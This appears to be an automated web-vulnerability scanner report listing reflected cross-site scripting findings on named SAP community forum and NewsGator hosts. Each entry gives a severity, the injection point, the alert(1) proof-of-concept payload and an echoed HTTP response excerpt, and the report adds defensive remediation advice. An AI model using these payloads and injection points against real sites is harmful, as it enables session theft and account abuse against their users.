Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the GetPic?image request parameter is copied into the HTML document as plain text between tags. The payload ff98d<img%20src%3da%20onerror%3dalert(1)>477fb398b41 was submitted in the GetPic?image parameter. This input was echoed as ff98d<img src=a onerror=alert(1)>477fb398b41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the dbedd'-alert(1)-'400de4f3298 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3974'-alert(1)-'0bf57f6bdb7 was submitted in the dbedd'-alert(1)-'400de4f3298 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
...[SNIP]... k that the required system properties are set!."); }else{ window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/community/ideas?dbedd'-alert(1)-'400de4f3298=1f3974'-alert(1)-'0bf57f6bdb7'); } } function scnLogOffRedirect(url, jiveURL) { if(url == null){ alert("The link URL is missing, Please check that the required system propert ...[SNIP]...
1.3. https://cw.sdn.sap.com/cw/community/ideas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://cw.sdn.sap.com
Path:
/cw/community/ideas
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbedd'-alert(1)-'400de4f3298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
...[SNIP]... ("The link URL is missing, Please check that the required system properties are set!."); }else{ window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/community/ideas?dbedd'-alert(1)-'400de4f3298=1'); } }
function submitIdea(containerID) {
if(containerID == null ){ alert("Cannot create an idea right now"); }else{ window.location.href = '/cw/create-idea!in ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5114f'-alert(1)-'4929ad66ff5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
...[SNIP]... ert("The link URL is missing, Please check that the required system properties are set!."); }else{ window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/ideas5114f'-alert(1)-'4929ad66ff5/6794'); } } function scnLogOffRedirect(url, jiveURL) { if(url == null){ alert("The link URL is missing, Please check that the required system pr ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e1c1'-alert(1)-'28c731b3c96 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20 Content-Type: text/html; charset=UTF-8 x-jal: 19 sap-isc-etag: J2EE/cw JP: D=38142 t=1321226062850345 Content-Length: 16304 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 23:14:22 GMT Connection: keep-alive
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... rt = location.port; var res = protocol + "//" + host; try { if(port.length() > 0); res = res + port; }catch(err){ } window.location.href = url + escape(res + '/ideas/67945e1c1'-alert(1)-'28c731b3c96'); } }
function scnLogOffRedirect(url, jiveURL) { if(url == null){ alert("The link URL is missing, Please check that the required system properties are set!."); }else{ window.loc ...[SNIP]...
1.6. https://cw.sdn.sap.com/cw/ideas/6794 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://cw.sdn.sap.com
Path:
/cw/ideas/6794
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80da3'-alert(1)-'1e2e99731f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
...[SNIP]... he link URL is missing, Please check that the required system properties are set!."); }else{ window.location.href = url + escape('https://cw.sdn.sap.com/cw/' + '/ideas/6794?80da3'-alert(1)-'1e2e99731f5=1'); } } function scnLogOffRedirect(url, jiveURL) { if(url == null){ alert("The link URL is missing, Please check that the required system prope ...[SNIP]...
1.7. https://cw.sdn.sap.com/cw/ideas/6794 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://cw.sdn.sap.com
Path:
/cw/ideas/6794
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e9d"><script>alert(1)</script>277a2c9c500 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the messageID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87246</script><a>5d291e2a5c was submitted in the messageID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTctMTMzOUU3NkU2MzMtQjg5NTExMzA5NzdBNEJCQw== Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 8715 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:45:52 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: Not Fou ...[SNIP]... s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/message.jspa?messageID=789391587246</script><a>5d291e2a5c"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
1.9. http://forums.sdn.sap.com/message.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.sdn.sap.com
Path:
/message.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c90"><a>b5d8cd961e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTctMTMzOUU3NzVFODAtNTdCMjRGQkQ3MDAxNUZEOA== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 45 SDN_CATEGORY: 3 SDN_THREAD: 1414217 SDN_MESSAGE: 7893915 Content-Length: 36649 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:46:23 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAML co ...[SNIP]... <link rel="stylesheet" type="text/css" href="/style/style.jsp?messageID=7893915&64c90"><a>b5d8cd961e9=1" /> ...[SNIP]...
1.10. http://forums.sdn.sap.com/message.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.sdn.sap.com
Path:
/message.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68510</script><a>c216dce91af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTctMTMzOUU3OEIzOUYtQzUwMzA1OUI0RjgxMTFDQw== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 45 SDN_CATEGORY: 3 SDN_THREAD: 1414217 SDN_MESSAGE: 7893915 Content-Length: 36821 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:47:50 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAML co ...[SNIP]... .prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/message.jspa?messageID=7893915&68510</script><a>c216dce91af=1"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
1.11. http://forums.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums.sdn.sap.com
Path:
/thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6382"><a>e34da4ea807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0OTctMTMzOUU3NTNFREMtNThCRkNDNzNFQjFDRUEwOA== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 53 SDN_CATEGORY: 2 SDN_THREAD: 2072047 SDN_MESSAGE: 10787731 Content-Length: 26941 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:44:04 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: SAP Por ...[SNIP]... <link rel="stylesheet" type="text/css" href="/style/style.jsp?a6382"><a>e34da4ea807=1&threadID=2072047" /> ...[SNIP]...
The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebb22</script>fe58fc0f1fc was submitted in the threadID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f181</script><a>eb754f6e0b3 was submitted in the threadID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 9751ab?xss request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938be</script><a>69597fa3541 was submitted in the 9751ab?xss parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 9c165%3C/script%3E%3Ca%3E35be9e751ab request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2cb5</script><a>d2dfd37ff4c was submitted in the 9c165%3C/script%3E%3Ca%3E35be9e751ab parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MkQtMTMzOUU3QzhDMzItN0Y1REM5MEI0M0QyRjVGQQ== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 41 SDN_CATEGORY: 2 SDN_THREAD: 480818 SDN_MESSAGE: 3770439 Content-Length: 116203 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:52:03 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: ESS Lea ...[SNIP]... prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818&9c165%3C/script%3E%3Ca%3E35be9e751ab=1d2cb5</script><a>d2dfd37ff4c"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
1.16. http://forums400.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums400.sdn.sap.com
Path:
/thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c165</script><a>35be9e751ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MkQtMTMzOUU3NTExQjAtRUE3N0ZDQkYyRjZGNzYxNA== Content-Type: text/html; charset=UTF-8 Content-Language: en-US SDN_FORUM: 41 SDN_CATEGORY: 2 SDN_THREAD: 480818 SDN_MESSAGE: 3770439 Content-Length: 113775 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:43:52 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: ESS Lea ...[SNIP]...
s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818&9c165</script><a>35be9e751ab=1"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
1.17. http://forums400.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://forums400.sdn.sap.com
Path:
/thread.jspa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf17f"><a>fda93e2b7c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11de</script><a>56173b93dc0 was submitted in the threadID parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: SAP J2EE Engine/7.00 SDN_UID: Guest SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD SDN_VISIT: QUMxMDY0MkQtMTMzOUU3NENCNkQtMjYyODRFQkZGMEU4Qjg0Rg== Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 8807 Vary: Accept-Encoding Date: Sun, 13 Nov 2011 19:43:34 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head> <!-- SDN Forums generated page --> <title>SAP Community Network Forums: Not Fou ...[SNIP]... " s.prop5="glo" s.prop6="visitor" s.prop9="logN" if(typeof pnf != "undefined") { s.pageType=pnf; s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818e11de</script><a>56173b93dc0"; } /* END CUSTOM CODING */ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() if(s_code)document.write(s_code) } catch (e) {} //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c8c95<img%20src%3da%20onerror%3dalert(1)>1bc394f6d10 was submitted in the REST URL parameter 1. This input was echoed as c8c95<img src=a onerror=alert(1)>1bc394f6d10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52884<img%20src%3da%20onerror%3dalert(1)>a54b19296e9 was submitted in the REST URL parameter 1. This input was echoed as 52884<img src=a onerror=alert(1)>a54b19296e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5a86f<script>alert(1)</script>f8176fc3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 30fa2<script>alert(1)</script>600e650462d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d46a3<script>alert(1)</script>ed1bab21ffe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dca84<script>alert(1)</script>708c6d8793 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 116cc<script>alert(1)</script>866c815398d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2b53e<script>alert(1)</script>f65685dfe5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 105ae<script>alert(1)</script>8208217648a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63639<script>alert(1)</script>ffb9b6d4be7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19c54<script>alert(1)</script>2e767a4db22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64d8b<script>alert(1)</script>9635c267d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76279<script>alert(1)</script>406dd7aa460 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bfed6<script>alert(1)</script>7971fd19724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bdedf<script>alert(1)</script>e23ec0fffc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 76ca2<script>alert(1)</script>458600cdb88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 632b4<script>alert(1)</script>7547db97ab4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 22016<script>alert(1)</script>659c332aa84 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the _dsrId request parameter is copied into the HTML document as plain text between tags. The payload 91605<script>alert(1)</script>f31917c8368 was submitted in the _dsrId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Last-Modified: Sun, 13 Nov 2011 19:38:30 GMT ETag: 634568099105169583 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 1341 Cache-Control: public, max-age=300 Date: Sun, 13 Nov 2011 19:44:47 GMT Connection: close
window.ng_scriptload({id:'ngbuzz_153692_data91605<script>alert(1)</script>f31917c8368',status:200,statusText:'200 OK',response:{Data:[{PostId:21198566603,PubDate:new Date(1321177020000),FeedName:'SAP Developer Network SAP Weblogs by Daniel Graversen',Title:'My thoughts on SAP Teched Ma ...[SNIP]...
The value of the buzzId request parameter is copied into the HTML document as plain text between tags. The payload dfe81<script>alert(1)</script>16777f97ec5 was submitted in the buzzId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Content-Length: 102 Cache-Control: private, max-age=600 Date: Sun, 13 Nov 2011 19:44:36 GMT Connection: close X-N: S
//An error occurred: Could not find Buzz item with id: 153692dfe81<script>alert(1)</script>16777f97ec5
1.39. http://nmp.newsgator.com/NGBuzz/buzz.ashx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nmp.newsgator.com
Path:
/NGBuzz/buzz.ashx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fa9d5%3balert(1)//f42b4d2691c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa9d5;alert(1)//f42b4d2691c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the msessionkey request parameter is copied into the HTML document as plain text between tags. The payload 9d28d<img%20src%3da%20onerror%3dalert(1)>40b9e83325f was submitted in the msessionkey parameter. This input was echoed as 9d28d<img src=a onerror=alert(1)>40b9e83325f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
